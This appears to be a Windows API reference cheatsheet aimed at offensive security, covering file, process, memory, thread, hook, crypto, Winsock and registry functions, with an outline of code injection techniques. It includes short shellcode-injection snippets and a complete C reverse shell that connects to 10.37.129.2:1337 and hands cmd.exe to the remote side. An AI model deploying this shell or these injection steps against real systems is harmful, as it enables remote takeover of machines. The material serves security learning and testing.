- Windows API Function Cheatsheets
- File Operations
- Process Management
- Memory Management
- Thread Management
- Dynamic-Link Library (DLL) Management
- Synchronization
- Interprocess Communication
- Windows Hooks
- Cryptography
- Debugging
- Winsock
- Registry Operations
- Error Handling
- Resource Management
- Unicode String Functions
- Win32 Structs Cheat Sheet
- Code Injection Techniques
- 1. DLL Injection
- 2. PE Injection
- 3. Reflective Injection
- 4. APC Injection
- 5. Process Hollowing (Process Replacement)
- 6. AtomBombing
- 7. Process Doppelgänging
- 8. Process Herpaderping
- 9. Hooking Injection
- 10. Extra Windows Memory Injection
- 11. Propagate Injection
- 12. Heap Spray
- 13. Thread Execution Hijacking
- 14. Module Stomping
- 15. IAT Hooking
- 16. Inline Hooking
- 17. Debugger Injection
- 18. COM Hijacking
- 19. Phantom DLL Hollowing
- 20. PROPagate
- 21. Early Bird Injection
- 22. Shim-based Injection
- 23. Mapping Injection
- 24. KnownDlls Cache Poisoning
- Process Enumeration
HANDLE CreateFile(
LPCTSTR lpFileName,
DWORD dwDesiredAccess,
DWORD dwShareMode,
LPSECURITY_ATTRIBUTES lpSecurityAttributes,
DWORD dwCreationDisposition,
DWORD dwFlagsAndAttributes,
HANDLE hTemplateFile
); // Opens an existing file or creates a new file.BOOL ReadFile(
HANDLE hFile,
LPVOID lpBuffer,
DWORD nNumberOfBytesToRead,
LPDWORD lpNumberOfBytesRead,
LPOVERLAPPED lpOverlapped
); // Reads data from the specified file.BOOL WriteFile(
HANDLE hFile,
LPCVOID lpBuffer,
DWORD nNumberOfBytesToWrite,
LPDWORD lpNumberOfBytesWritten,
LPOVERLAPPED lpOverlapped
); // Writes data to the specified file.BOOL CloseHandle(
HANDLE hObject
); // Closes an open handle.HANDLE OpenProcess(
[in] DWORD dwDesiredAccess,
[in] BOOL bInheritHandle,
[in] DWORD dwProcessId
); // Opens an existing local process object. e.g., try to open target processhProc = OpenProcess( PROCESS_CREATE_THREAD | PROCESS_QUERY_INFORMATION | PROCESS_VM_OPERATION | PROCESS_VM_READ | PROCESS_VM_WRITE, FALSE, (DWORD) pid);HANDLE CreateProcess(
LPCTSTR lpApplicationName,
LPTSTR lpCommandLine,
LPSECURITY_ATTRIBUTES lpProcessAttributes,
LPSECURITY_ATTRIBUTES lpThreadAttributes,
BOOL bInheritHandles,
DWORD dwCreationFlags,
LPVOID lpEnvironment,
LPCTSTR lpCurrentDirectory,
LPSTARTUPINFO lpStartupInfo,
LPPROCESS_INFORMATION lpProcessInformation
); // The CreateProcess function creates a new process that runs independently of the creating process. For simplicity, this relationship is called a parent-child relationship.// Start the child process
// No module name (use command line), Command line, Process handle not inheritable, Thread handle not inheritable, Set handle inheritance to FALSE, No creation flags, Use parent's environment block, Use parent's starting directory, Pointer to STARTUPINFO structure, Pointer to PROCESS_INFORMATION structure
CreateProcess( NULL, argv[1], NULL, NULL, FALSE, 0, NULL, NULL, &si, &pi); UINT WinExec(
[in] LPCSTR lpCmdLine,
[in] UINT uCmdShow
); // Runs the specified application.result = WinExec(L"C:\\Windows\\System32\\cmd.exe", SW_SHOWNORMAL);BOOL TerminateProcess(
HANDLE hProcess,
UINT uExitCode
); // Terminates the specified process.BOOL ExitWindowsEx(
[in] UINT uFlags,
[in] DWORD dwReason
); // Logs off the interactive user, shuts down the system, or shuts down and restarts the system.bResult = ExitWindowsEx(EWX_REBOOT, SHTDN_REASON_MAJOR_APPLICATION);HANDLE CreateToolhelp32Snapshot(
[in] DWORD dwFlags,
[in] DWORD th32ProcessID
); // used to obtain information about processes and threads running on a Windows system.BOOL Process32First(
[in] HANDLE hSnapshot,
[in, out] LPPROCESSENTRY32 lppe
); // used to retrieve information about the first process encountered in a system snapshot, which is typically taken using the CreateToolhelp32Snapshot function.BOOL Process32Next(
[in] HANDLE hSnapshot,
[out] LPPROCESSENTRY32 lppe
); // used to retrieve information about the next process in a system snapshot after Process32First has been called. This function is typically used in a loop to enumerate all processes captured in a snapshot taken using the CreateToolhelp32Snapshot function.BOOL WriteProcessMemory(
[in] HANDLE hProcess,
[in] LPVOID lpBaseAddress,
[in] LPCVOID lpBuffer,
[in] SIZE_T nSize,
[out] SIZE_T *lpNumberOfBytesWritten
); // Writes data to an area of memory in a specified process. The entire area to be written to must be accessible or the operation fails.WriteProcessMemory(hProc, pRemoteCode, (PVOID)payload, (SIZE_T)payload_len, (SIZE_T *)NULL); // pRemoteCode from VirtualAllocExBOOL ReadProcessMemory(
[in] HANDLE hProcess,
[in] LPCVOID lpBaseAddress,
[out] LPVOID lpBuffer,
[in] SIZE_T nSize,
[out] SIZE_T *lpNumberOfBytesRead
); // ReadProcessMemory copies the data in the specified address range from the address space of the specified process into the specified buffer of the current process.bResult = ReadProcessMemory(pHandle, (void*)baseAddress, &address, sizeof(address), 0);LPVOID VirtualAlloc(
LPVOID lpAddress,
SIZE_T dwSize, // Shellcode must be between 0x1 and 0x10000 bytes (page size)
DWORD flAllocationType, // #define MEM_COMMIT 0x00001000
DWORD flProtect // #define PAGE_EXECUTE_READWRITE 0x00000040
); // Reserves, commits, or changes the state of a region of memory within the virtual address space of the calling process.LPVOID VirtualAllocEx(
[in] HANDLE hProcess,
[in, optional] LPVOID lpAddress,
[in] SIZE_T dwSize,
[in] DWORD flAllocationType,
[in] DWORD flProtect
); // Reserves, commits, or changes the state of a region of memory within the virtual address space of a specified process. The function initializes the memory it allocates to zero.pRemoteCode = VirtualAllocEx(hProc, NULL, payload_len, MEM_COMMIT, PAGE_EXECUTE_READ);BOOL VirtualFree(
LPVOID lpAddress,
SIZE_T dwSize,
DWORD dwFreeType
); // Releases, decommits, or releases and decommits a region of memory within the virtual address space of the calling process.VirtualProtect function (memoryapi.h)
BOOL VirtualProtect(
LPVOID lpAddress,
SIZE_T dwSize,
DWORD flNewProtect,
PDWORD lpflOldProtect
); // Changes the protection on a region of committed pages in the virtual address space of the calling process.VOID RtlMoveMemory(
_Out_ VOID UNALIGNED *Destination,
_In_ const VOID UNALIGNED *Source,
_In_ SIZE_T Length
); // Copies the contents of a source memory block to a destination memory block, and supports overlapping source and destination memory blocks.HANDLE CreateThread(
[in, optional] LPSECURITY_ATTRIBUTES lpThreadAttributes, // A pointer to a SECURITY_ATTRIBUTES structure that specifies a security descriptor for the new thread and determines whether child processes can inherit the returned handle.
[in] SIZE_T dwStackSize, // The initial size of the stack, in bytes.
[in] LPTHREAD_START_ROUTINE lpStartAddress, // A pointer to the application-defined function of type LPTHREAD_START_ROUTINE
[in, optional] __drv_aliasesMem LPVOID lpParameter, // A pointer to a variable to be passed to the thread function.
[in] DWORD dwCreationFlags, // The flags that control the creation of the thread.
[out, optional] LPDWORD lpThreadId // A pointer to a variable that receives the thread identifier. If this parameter is NULL, the thread identifier is not returned.
); // Creates a thread to execute within the virtual address space of the calling process.th = CreateThread(0, 0, (LPTHREAD_START_ROUTINE) exec_mem, 0, 0, 0); WaitForSingleObject(th, 0);HANDLE CreateRemoteThread(
[in] HANDLE hProcess,
[in] LPSECURITY_ATTRIBUTES lpThreadAttributes,
[in] SIZE_T dwStackSize,
[in] LPTHREAD_START_ROUTINE lpStartAddress,
[in] LPVOID lpParameter,
[in] DWORD dwCreationFlags,
[out] LPDWORD lpThreadId
); // Creates a thread that runs in the virtual address space of another process.hThread = CreateRemoteThread(hProc, NULL, 0, pRemoteCode, NULL, 0, NULL); // pRemoteCode from VirtualAllocEx filled by WriteProcessMemoryHANDLE CreateRemoteThreadEx(
[in] HANDLE hProcess,
[in, optional] LPSECURITY_ATTRIBUTES lpThreadAttributes,
[in] SIZE_T dwStackSize,
[in] LPTHREAD_START_ROUTINE lpStartAddress,
[in, optional] LPVOID lpParameter,
[in] DWORD dwCreationFlags,
[in, optional] LPPROC_THREAD_ATTRIBUTE_LIST lpAttributeList,
[out, optional] LPDWORD lpThreadId
); // Creates a thread that runs in the virtual address space of another process and optionally specifies extended attributes such as processor group affinity.
// See InitializeProcThreadAttributeListhThread = CreateRemoteThread(hProc, NULL, 0, pRemoteCode, NULL, 0, lpAttributeList, NULL); // pRemoteCode from VirtualAllocEx filled by WriteProcessMemoryVOID ExitThread(
DWORD dwExitCode
); // Terminates the calling thread and returns the exit code to the operating system.BOOL GetExitCodeThread(
HANDLE hThread,
LPDWORD lpExitCode
); // Retrieves the termination status of the specified thread.DWORD ResumeThread(
HANDLE hThread
); // Decrements a thread's suspend count. When the suspend count is decremented to zero, the execution of the thread is resumed.DWORD SuspendThread(
HANDLE hThread
); // Suspends the specified thread.BOOL TerminateThread(
HANDLE hThread,
DWORD dwExitCode
); // Terminates the specified thread.BOOL CloseHandle(
HANDLE hObject
); // Closes an open handle.HMODULE LoadLibrary(
LPCTSTR lpFileName
); // Loads a dynamic-link library (DLL) module into the address space of the calling process.HMODULE LoadLibraryExA(
[in] LPCSTR lpLibFileName,
HANDLE hFile,
[in] DWORD dwFlags
); // Loads the specified module into the address space of the calling process, with additional options.HMODULE hModule = LoadLibraryExA("ws2_32.dll", NULL, LOAD_LIBRARY_SAFE_CURRENT_DIRS);FARPROC GetProcAddress(
HMODULE hModule,
LPCSTR lpProcName
); // Retrieves the address of an exported function or variable from the specified DLL.pLoadLibrary = (PTHREAD_START_ROUTINE) GetProcAddress(GetModuleHandle("Kernel32.dll"), "LoadLibraryA");BOOL FreeLibrary(
HMODULE hModule
); // Frees the loaded DLL module and, if necessary, decrements its reference count.HANDLE CreateMutex(
LPSECURITY_ATTRIBUTES lpMutexAttributes,
BOOL bInitialOwner,
LPCTSTR lpName
); // Creates a named or unnamed mutex object.HANDLE CreateSemaphore(
LPSECURITY_ATTRIBUTES lpSemaphoreAttributes,
LONG lInitialCount,
LONG lMaximumCount,
LPCTSTR lpName
); // Creates a named or unnamed semaphore object.BOOL ReleaseMutex(
HANDLE hMutex
); // Releases ownership of the specified mutex object.BOOL ReleaseSemaphore(
HANDLE hSemaphore,
LONG lReleaseCount,
LPLONG lpPreviousCount
); // Increases the count of the specified semaphore object by a specified amount.DWORD WaitForSingleObject(
[in] HANDLE hHandle,
[in] DWORD dwMilliseconds
); // Waits until the specified object is in the signaled state or the time-out interval elapses.WaitForSingleObject(hThread, 500);BOOL CreatePipe(
PHANDLE hReadPipe,
PHANDLE hWritePipe,
LPSECURITY_ATTRIBUTES lpPipeAttributes,
DWORD nSize
); // Creates an anonymous pipe and returns handles to the read and write ends of the pipe.HANDLE CreateNamedPipe(
LPCTSTR lpName,
DWORD dwOpenMode,
DWORD dwPipeMode,
DWORD nMaxInstances,
DWORD nOutBufferSize,
DWORD nInBufferSize,
DWORD nDefaultTimeOut,
LPSECURITY_ATTRIBUTES lpSecurityAttributes
); // Creates a named pipe and returns a handle for subsequent pipe operations.BOOL ConnectNamedPipe(
HANDLE hNamedPipe,
LPOVERLAPPED lpOverlapped
); // Enables a named pipe server process to wait for a client process to connect to an instance of a named pipe.BOOL DisconnectNamedPipe(
HANDLE hNamedPipe
); // Disconnects the server end of a named pipe instance from a client process.HANDLE CreateFileMapping(
HANDLE hFile,
LPSECURITY_ATTRIBUTES lpFileMappingAttributes,
DWORD flProtect,
DWORD dwMaximumSizeHigh,
DWORD dwMaximumSizeLow,
LPCTSTR lpName
); // Creates or opens a named or unnamed file mapping object for a specified file.LPVOID MapViewOfFile(
HANDLE hFileMappingObject,
DWORD dwDesiredAccess,
DWORD dwFileOffsetHigh,
DWORD dwFileOffsetLow,
SIZE_T dwNumberOfBytesToMap
); // Maps a view of a file mapping into the address space of the calling process.BOOL UnmapViewOfFile(
LPCVOID lpBaseAddress
); // Unmaps a mapped view of a file from the calling process's address space.BOOL CloseHandle(
HANDLE hObject
); // Closes an open handle.HHOOK SetWindowsHookExA(
[in] int idHook,
[in] HOOKPROC lpfn,
[in] HINSTANCE hmod,
[in] DWORD dwThreadId
); // Installs an application-defined hook procedure into a hook chain. You would install a hook procedure to monitor the system for certain types of events. These events are associated either with a specific thread or with all threads in the same desktop as the calling thread.LRESULT CallNextHookEx(
[in, optional] HHOOK hhk,
[in] int nCode,
[in] WPARAM wParam,
[in] LPARAM lParam
); // Passes the hook information to the next hook procedure in the current hook chain. A hook procedure can call this function either before or after processing the hook information.BOOL UnhookWindowsHookEx(
[in] HHOOK hhk
); // Removes a hook procedure installed in a hook chain by the SetWindowsHookEx function.SHORT GetAsyncKeyState(
[in] int vKey
); // Determines whether a key is up or down at the time the function is called, and whether the key was pressed after a previous call to GetAsyncKeyState.SHORT GetKeyState(
[in] int nVirtKey
); // Retrieves the status of the specified virtual key. The status specifies whether the key is up, down, or toggled (on, off—alternating each time the key is pressed).BOOL GetKeyboardState(
[out] PBYTE lpKeyState
); // Copies the status of the 256 virtual keys to the specified buffer.BOOL CryptBinaryToStringA(
[in] const BYTE *pbBinary,
[in] DWORD cbBinary,
[in] DWORD dwFlags,
[out, optional] LPSTR pszString,
[in, out] DWORD *pcchString
); // The CryptBinaryToString function converts an array of bytes into a formatted string.BOOL CryptDecrypt(
[in] HCRYPTKEY hKey,
[in] HCRYPTHASH hHash,
[in] BOOL Final,
[in] DWORD dwFlags,
[in, out] BYTE *pbData,
[in, out] DWORD *pdwDataLen
); // The CryptDecrypt function decrypts data previously encrypted by using the CryptEncrypt function.BOOL CryptEncrypt(
[in] HCRYPTKEY hKey,
[in] HCRYPTHASH hHash,
[in] BOOL Final,
[in] DWORD dwFlags,
[in, out] BYTE *pbData,
[in, out] DWORD *pdwDataLen,
[in] DWORD dwBufLen
); // The CryptEncrypt function encrypts data. The algorithm used to encrypt the data is designated by the key held by the CSP module and is referenced by the hKey parameter.BOOL CryptDecryptMessage(
[in] PCRYPT_DECRYPT_MESSAGE_PARA pDecryptPara,
[in] const BYTE *pbEncryptedBlob,
[in] DWORD cbEncryptedBlob,
[out, optional] BYTE *pbDecrypted,
[in, out, optional] DWORD *pcbDecrypted,
[out, optional] PCCERT_CONTEXT *ppXchgCert
); // The CryptDecryptMessage function decodes and decrypts a message.BOOL CryptEncryptMessage(
[in] PCRYPT_ENCRYPT_MESSAGE_PARA pEncryptPara,
[in] DWORD cRecipientCert,
[in] PCCERT_CONTEXT [] rgpRecipientCert,
[in] const BYTE *pbToBeEncrypted,
[in] DWORD cbToBeEncrypted,
[out] BYTE *pbEncryptedBlob,
[in, out] DWORD *pcbEncryptedBlob
); // The CryptEncryptMessage function encrypts and encodes a message.BOOL IsDebuggerPresent(); // Determines whether the calling process is being debugged by a user-mode debugger.BOOL CheckRemoteDebuggerPresent(
[in] HANDLE hProcess,
[in, out] PBOOL pbDebuggerPresent
); // Determines whether the specified process is being debugged.void OutputDebugStringA(
[in, optional] LPCSTR lpOutputString
); // Sends a string to the debugger for display./*** Windows Reverse Shell
*
* ██████ ███▄ █ ▒█████ █ █░ ▄████▄ ██▀███ ▄▄▄ ██████ ██░ ██
* ▒██ ▒ ██ ▀█ █ ▒██▒ ██▒▓█░ █ ░█░▒██▀ ▀█ ▓██ ▒ ██▒▒████▄ ▒██ ▒ ▓██░ ██▒
* ░ ▓██▄ ▓██ ▀█ ██▒▒██░ ██▒▒█░ █ ░█ ▒▓█ ▄ ▓██ ░▄█ ▒▒██ ▀█▄ ░ ▓██▄ ▒██▀▀██░
* ▒ ██▒▓██▒ ▐▌██▒▒██ ██░░█░ █ ░█ ▒▓▓▄ ▄██▒▒██▀▀█▄ ░██▄▄▄▄██ ▒ ██▒░▓█ ░██
* ▒██████▒▒▒██░ ▓██░░ ████▓▒░░░██▒██▓ ▒ ▓███▀ ░░██▓ ▒██▒ ▓█ ▓██▒▒██████▒▒░▓█▒░██▓
* ▒ ▒▓▒ ▒ ░░ ▒░ ▒ ▒ ░ ▒░▒░▒░ ░ ▓░▒ ▒ ░ ░▒ ▒ ░░ ▒▓ ░▒▓░ ▒▒ ▓▒█░▒ ▒▓▒ ▒ ░ ▒ ░░▒░▒
* ░ ░▒ ░ ░░ ░░ ░ ▒░ ░ ▒ ▒░ ▒ ░ ░ ░ ▒ ░▒ ░ ▒░ ▒ ▒▒ ░░ ░▒ ░ ░ ▒ ░▒░ ░
* ░ ░ ░ ░ ░ ░ ░ ░ ░ ▒ ░ ░ ░ ░░ ░ ░ ▒ ░ ░ ░ ░ ░░ ░
* ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░
* Written by: snowcra5h@icloud.com (snowcra5h) 2023
*
* This program establishes a reverse shell via the Winsock2 library. It is
* designed to establish a connection to a specified remote server, and execute commands
* received from the server on the local machine, giving the server
* control over the local machine.
*
* Compile command (using MinGW on Wine):
* wine gcc.exe windows.c -o windows.exe -lws2_32
*
* This code is intended for educational and legitimate penetration testing purposes only.
* Please use responsibly and ethically.
*
*/
#include <winsock2.h>
#include <ws2tcpip.h>
#include <stdio.h>
#include <windows.h>
#include <process.h>
const char* const PORT = "1337";
const char* const IP = "10.37.129.2";
typedef struct {
HANDLE hPipeRead;
HANDLE hPipeWrite;
SOCKET sock;
} ThreadParams;
DWORD WINAPI OutputThreadFunc(LPVOID data);
DWORD WINAPI InputThreadFunc(LPVOID data);
void CleanUp(HANDLE hInputWrite, HANDLE hInputRead, HANDLE hOutputWrite, HANDLE hOutputRead, PROCESS_INFORMATION processInfo, addrinfo* result, SOCKET sock);
int main(int argc, char** argv) {
WSADATA wsaData;
int err = WSAStartup(MAKEWORD(2, 2), &wsaData);
if (err != 0) {
fprintf(stderr, "WSAStartup failed: %d\n", err);
return 1;
}
SOCKET sock = WSASocket(AF_INET, SOCK_STREAM, IPPROTO_TCP, NULL, 0, WSA_FLAG_OVERLAPPED);
if (sock == INVALID_SOCKET) {
fprintf(stderr, "Socket function failed with error = %d\n", WSAGetLastError());
WSACleanup();
return 1;
}
struct addrinfo hints = { 0 };
hints.ai_family = AF_INET;
hints.ai_socktype = SOCK_STREAM;
struct addrinfo* result;
err = getaddrinfo(IP, PORT, &hints, &result);
if (err != 0) {
fprintf(stderr, "Failed to get address info: %d\n", err);
CleanUp(NULL, NULL, NULL, NULL, { 0 }, result, sock);
return 1;
}
if (WSAConnect(sock, result->ai_addr, (int)result->ai_addrlen, NULL, NULL, NULL, NULL) == SOCKET_ERROR) {
fprintf(stderr, "Failed to connect.\n");
CleanUp(NULL, NULL, NULL, NULL, { 0 }, result, sock);
return 1;
}
SECURITY_ATTRIBUTES sa = { sizeof(SECURITY_ATTRIBUTES), NULL, TRUE };
HANDLE hInputWrite, hOutputRead, hInputRead, hOutputWrite;
if (!CreatePipe(&hOutputRead, &hOutputWrite, &sa, 0) || !CreatePipe(&hInputRead, &hInputWrite, &sa, 0)) {
fprintf(stderr, "Failed to create pipe.\n");
CleanUp(NULL, NULL, NULL, NULL, { 0 }, result, sock);
return 1;
}
STARTUPINFO startupInfo = { 0 };
startupInfo.cb = sizeof(startupInfo);
startupInfo.dwFlags = STARTF_USESTDHANDLES;
startupInfo.hStdInput = hInputRead;
startupInfo.hStdOutput = hOutputWrite;
startupInfo.hStdError = hOutputWrite;
PROCESS_INFORMATION processInfo;
WCHAR cmd[] = L"cmd.exe /k";
if (!CreateProcess(NULL, cmd, NULL, NULL, TRUE, 0, NULL, NULL, &startupInfo, &processInfo)) {
fprintf(stderr, "Failed to create process.\n");
CleanUp(hInputWrite, hInputRead, hOutputWrite, hOutputRead, processInfo, result, sock);
return 1;
}
CloseHandle(hInputRead);
CloseHandle(hOutputWrite);
CloseHandle(processInfo.hThread);
ThreadParams outputParams = { hOutputRead, NULL, sock };
ThreadParams inputParams = { NULL, hInputWrite, sock };
HANDLE hThread[2];
hThread[0] = CreateThread(NULL, 0, OutputThreadFunc, &outputParams, 0, NULL);
hThread[1] = CreateThread(NULL, 0, InputThreadFunc, &inputParams, 0, NULL);
WaitForMultipleObjects(2, hThread, TRUE, INFINITE);
CleanUp(hInputWrite, NULL, NULL, hOutputRead, processInfo, result, sock);
return 0;
}
void CleanUp(HANDLE hInputWrite, HANDLE hInputRead, HANDLE hOutputWrite, HANDLE hOutputRead, PROCESS_INFORMATION processInfo, addrinfo* result, SOCKET sock) {
if (hInputWrite != NULL) CloseHandle(hInputWrite);
if (hInputRead != NULL) CloseHandle(hInputRead);
if (hOutputWrite != NULL) CloseHandle(hOutputWrite);
if (hOutputRead != NULL) CloseHandle(hOutputRead);
if (processInfo.hProcess != NULL) CloseHandle(processInfo.hProcess);
if (processInfo.hThread != NULL) CloseHandle(processInfo.hThread);
if (result != NULL) freeaddrinfo(result);
if (sock != NULL) closesocket(sock);
WSACleanup();
}
DWORD WINAPI OutputThreadFunc(LPVOID data) {
ThreadParams* params = (ThreadParams*)data;
char buffer[4096];
DWORD bytesRead;
while (ReadFile(params->hPipeRead, buffer, sizeof(buffer) - 1, &bytesRead, NULL)) {
buffer[bytesRead] = '\0';
send(params->sock, buffer, bytesRead, 0);
}
return 0;
}
DWORD WINAPI InputThreadFunc(LPVOID data) {
ThreadParams* params = (ThreadParams*)data;
char buffer[4096];
int bytesRead;
while ((bytesRead = recv(params->sock, buffer, sizeof(buffer) - 1, 0)) > 0) {
DWORD bytesWritten;
WriteFile(params->hPipeWrite, buffer, bytesRead, &bytesWritten, NULL);
}
return 0;
}int WSAStartup(
WORD wVersionRequired,
LPWSADATA lpWSAData
); // Initializes the Winsock library for an application. Must be called before any other Winsock functions.int WSAConnect(
SOCKET s, // Descriptor identifying a socket.
const struct sockaddr* name, // Pointer to the sockaddr structure for the connection target.
int namelen, // Length of the sockaddr structure.
LPWSABUF lpCallerData, // Pointer to user data to be transferred during connection.
LPWSABUF lpCalleeData, // Pointer to user data transferred back during connection.
LPQOS lpSQOS, // Pointer to flow specs for socket s, one for each direction.
LPQOS lpGQOS // Pointer to flow specs for the socket group.
); // Establishes a connection to another socket application.This function is similar to connect, but allows for more control over the connection process.int WSASend(
SOCKET s, // Descriptor identifying a connected socket.
LPWSABUF lpBuffers, // Array of buffers for data to be sent.
DWORD dwBufferCount, // Number of buffers in the lpBuffers array.
LPDWORD lpNumberOfBytesSent, // Pointer to the number of bytes sent by this function call.
DWORD dwFlags, // Flags to modify the behavior of the function call.
LPWSAOVERLAPPED lpOverlapped, // Pointer to an overlapped structure for asynchronous operations.
LPWSAOVERLAPPED_COMPLETION_ROUTINE lpCompletionRoutine // Pointer to the completion routine called when the send operation has been completed.
); // Sends data on a connected socket.It can be used for both synchronous and asynchronous data transfer.int WSARecv(
SOCKET s, // Descriptor identifying a connected socket.
LPWSABUF lpBuffers, // Array of buffers to receive the incoming data.
DWORD dwBufferCount, // Number of buffers in the lpBuffers array.
LPDWORD lpNumberOfBytesRecvd, // Pointer to the number of bytes received by this function call.
LPDWORD lpFlags, // Flags to modify the behavior of the function call.
LPWSAOVERLAPPED lpOverlapped, // Pointer to an overlapped structure for asynchronous operations.
LPWSAOVERLAPPED_COMPLETION_ROUTINE lpCompletionRoutine // Pointer to the completion routine called when the receive operation has been completed.
); //Receives data from a connected socket, and can also be used for both synchronous and asynchronous data transfer.int WSASendTo(
SOCKET s, // Descriptor identifying a socket.
LPWSABUF lpBuffers, // Array of buffers containing the data to be sent.
DWORD dwBufferCount, // Number of buffers in the lpBuffers array.
LPDWORD lpNumberOfBytesSent, // Pointer to the number of bytes sent by this function call.
DWORD dwFlags, // Flags to modify the behavior of the function call.
const struct sockaddr* lpTo, // Pointer to the sockaddr structure for the target address.
int iToLen, // Size of the address in lpTo.
LPWSAOVERLAPPED lpOverlapped, // Pointer to an overlapped structure for asynchronous operations.
LPWSAOVERLAPPED_COMPLETION_ROUTINE lpCompletionRoutine // Pointer to the completion routine called when the send operation has been completed.
); // Sends data to a specific destination, for use with connection - less socket types such as SOCK_DGRAM.int WSARecvFrom(
SOCKET s, // Descriptor identifying a socket.
LPWSABUF lpBuffers, // Array of buffers to receive the incoming data.
DWORD dwBufferCount, // Number of buffers in the lpBuffers array.
LPDWORD lpNumberOfBytesRecvd, // Pointer to the number of bytes received by this function call.
LPDWORD lpFlags, // Flags to modify the behavior of the function call.
struct sockaddr* lpFrom, // Pointer to an address structure that will receive the source address upon completion of the operation.
LPINT lpFromlen, // Pointer to the size of the lpFrom address structure.
LPWSAOVERLAPPED lpOverlapped, // Pointer to an overlapped structure for asynchronous operations.
LPWSAOVERLAPPED_COMPLETION_ROUTINE lpCompletionRoutine // Pointer to the completion routine called when the receive operation has been completed.
); //Receives data from a specific source, used with connection - less socket types such as SOCK_DGRAM.int WSAAsyncSelect(
SOCKET s, // Descriptor identifying the socket.
HWND hWnd, // Handle to the window which should receive the message.
unsigned int wMsg, // Message to be received when an event occurs.
long lEvent // Bitmask specifying a group of conditions to be monitored.
); // Requests Windows message - based notification of network events for a socket.SOCKET socket(
int af,
int type,
int protocol
); // Creates a new socket for network communication.int bind(
SOCKET s,
const struct sockaddr *name,
int namelen
); // Binds a socket to a specific local address and port.int listen(
SOCKET s,
int backlog
); // Sets a socket to listen for incoming connections.SOCKET accept(
SOCKET s,
struct sockaddr *addr,
int *addrlen
); // Accepts a new incoming connection on a listening socket.int connect(
SOCKET s,
const struct sockaddr *name,
int namelen
); // Initiates a connection on a socket to a remote address.int send(
SOCKET s,
const char *buf,
int len,
int flags
); // Sends data on a connected socket.int recv(
SOCKET s,
char *buf,
int len,
int flags
); // Receives data from a connected socket.int closesocket(
SOCKET s
); //Closes a socket and frees its resources.hostent* gethostbyname(
const char* name // either a hostname or an IPv4 address in dotted-decimal notation
); // returns a pointer to a hostent struct. NOTE: Typically better to use getaddrinfoLONG RegOpenKeyExW(
HKEY hKey,
LPCWTSTR lpSubKey,
DWORD ulOptions,
REGSAM samDesired,
PHKEY phkResult
); // Opens the specified registry key.LONG RegQueryValueExW(
HKEY hKey,
LPCWTSTR lpValueName,
LPDWORD lpReserved,
LPDWORD lpType,
LPBYTE lpData,
LPDWORD lpcbData
); // Retrieves the type and data of the specified value name associated with an open registry key.LONG RegSetValueEx(
HKEY hKey,
LPCWTSTR lpValueName,
DWORD Reserved,
DWORD dwType,
const BYTE *lpData,
DWORD cbData
); // Sets the data and type of the specified value name associated with an open registry key.LONG RegCloseKey(
HKEY hKey
); // Closes a handle to the specified registry key.LSTATUS RegCreateKeyExA(
[in] HKEY hKey,
[in] LPCSTR lpSubKey,
DWORD Reserved,
[in, optional] LPSTR lpClass,
[in] DWORD dwOptions,
[in] REGSAM samDesired,
[in, optional] const LPSECURITY_ATTRIBUTES lpSecurityAttributes,
[out] PHKEY phkResult,
[out, optional] LPDWORD lpdwDisposition
); // Creates the specified registry key. If the key already exists, the function opens it. Note that key names are not case sensitive. LSTATUS RegSetValueExA(
[in] HKEY hKey,
[in, optional] LPCSTR lpValueName,
DWORD Reserved,
[in] DWORD dwType,
[in] const BYTE *lpData,
[in] DWORD cbData
); // Sets the data and type of a specified value under a registry key.LSTATUS RegCreateKeyA(
[in] HKEY hKey,
[in, optional] LPCSTR lpSubKey,
[out] PHKEY phkResult
); // Creates the specified registry key. If the key already exists in the registry, the function opens it.LSTATUS RegDeleteKeyA(
[in] HKEY hKey,
[in] LPCSTR lpSubKey
); // Deletes a subkey and its values. Note that key names are not case sensitive.__kernel_entry NTSTATUS NtRenameKey(
[in] HANDLE KeyHandle,
[in] PUNICODE_STRING NewName
); // Changes the name of the specified registry key.int WSAGetLastError(
void
); // Returns the error status for the last Windows Sockets operation that failed.void WSASetLastError(
int iError
); // Sets the error status for the last Windows Sockets operation.BOOL WSAGetOverlappedResult(
SOCKET s,
LPWSAOVERLAPPED lpOverlapped,
LPDWORD lpcbTransfer,
BOOL fWait,
LPDWORD lpdwFlags
); // Determines the results of an overlapped operation on the specified socket.int WSAIoctl(
SOCKET s,
DWORD dwIoControlCode,
LPVOID lpvInBuffer,
DWORD cbInBuffer,
LPVOID lpvOutBuffer,
DWORD cbOutBuffer,
LPDWORD lpcbBytesReturned,
LPWSAOVERLAPPED lpOverlapped,
LPWSAOVERLAPPED_COMPLETION_ROUTINE lpCompletionRoutine
); // Controls the mode of a socket.WSAEVENT WSACreateEvent(
void
); // Creates a new event object.BOOL WSASetEvent(
WSAEVENT hEvent
); // Sets the state of the specified event object to signaled.BOOL WSAResetEvent(
WSAEVENT hEvent
); // Sets the state of the specified event object to nonsignaled.BOOL WSACloseEvent(
WSAEVENT hEvent
); // Closes an open event object handle.DWORD WSAWaitForMultipleEvents(
DWORD cEvents,
const WSAEVENT *lphEvents,
BOOL fWaitAll,
DWORD dwTimeout,
BOOL fAlertable
); // Waits for multiple event objects and returns when the specified events are signaled or the time-out interval elapses.HRSRC FindResource(
[in, optional] HMODULE hModule, // A handle to the module whose portable executable file or an accompanying MUI file contains the resource. If this parameter is NULL, the function searches the module used to create the current process.
[in] LPCSTR lpName, // The name of the resource.
[in] LPCSTR lpType // The resource type.
); // Determines the location of a resource with the specified type and name in the specified module.HRSRC res = FindResource(NULL, MAKEINTRESOURCE(FAVICON_ICO), RT_RCDATA);HGLOBAL LoadResource(
[in, optional] HMODULE hModule, // A handle to the module whose executable file contains the resource.
[in] HRSRC hResInfo // A handle to the resource to be loaded.
); // Retrieves a handle that can be used to obtain a pointer to the first byte of the specified resource in memory.HGLOBAL resHandle = resHandle = LoadResource(NULL, res);LPVOID LockResource(
[in] HGLOBAL hResData // A handle to the resource to be accessed
); // Retrieves a pointer to the specified resource in memory.unsigned char * payload = (char *) LockResource(resHandle);DWORD SizeofResource(
[in, optional] HMODULE hModule, // A handle to the module whose executable file contains the resource
[in] HRSRC hResInfo // A handle to the resource. This handle must be created by using FindResource
); // Retrieves the size, in bytes, of the specified resource.unsigned int payload_len = SizeofResource(NULL, res);#include <wchar.h> // for wide character string routinessize_t wcslen(
const wchar_t *str
); // Returns the length of the given wide string.[wcscpy]
wchar_t *wcscpy(
wchar_t *dest,
const wchar_t *src
); // Copies the wide string from src to dest.[wcsncpy]
wchar_t *wcsncpy(
wchar_t *dest,
const wchar_t *src,
